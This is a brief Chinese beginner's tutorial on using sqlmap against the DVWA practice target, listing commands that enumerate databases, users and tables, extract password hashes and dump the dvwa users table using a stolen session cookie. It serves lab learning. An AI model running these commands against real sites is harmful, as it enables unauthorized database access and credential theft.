Sqlmap测试DVWA靶机教程
菜鸟记录每一天,大佬勿喷。
00x1:首先打开DVWA靶机。并且按F12查看cookie。
00x2:在kali中打开sqlmap并键入:sqlmap -u “url” --cookie “xxx” --batch --dbs 查看靶机数据库。
在键入:sqlmap -u “url” --cookie “xxx” --batch --current-db 查看当前数据库。
再键入:sqlmap -u “url” --cookie “xxx” --batch --users 查看当前所有用户名。
接着键入:sqlmap -u “url” --cookie “xxx” --batch --users --passwords 查看当前用户名和密码。
接着键入:sqlmap -u “url” --cookie “xxx” --batch -D 数据库名 --tables 查看当前用户名的所有表。
接着键入:sqlmap -u “url” --cookie “xxx” --batch -D dvwa -T users --columns 查看当前表中所有数据。
再接着键入:sqlmap -u “url” --cookie “xxx” --batch -D dvwa -T users -C “user,password” --dump 保存当前数据。
最后键入:cat 文件路径查看。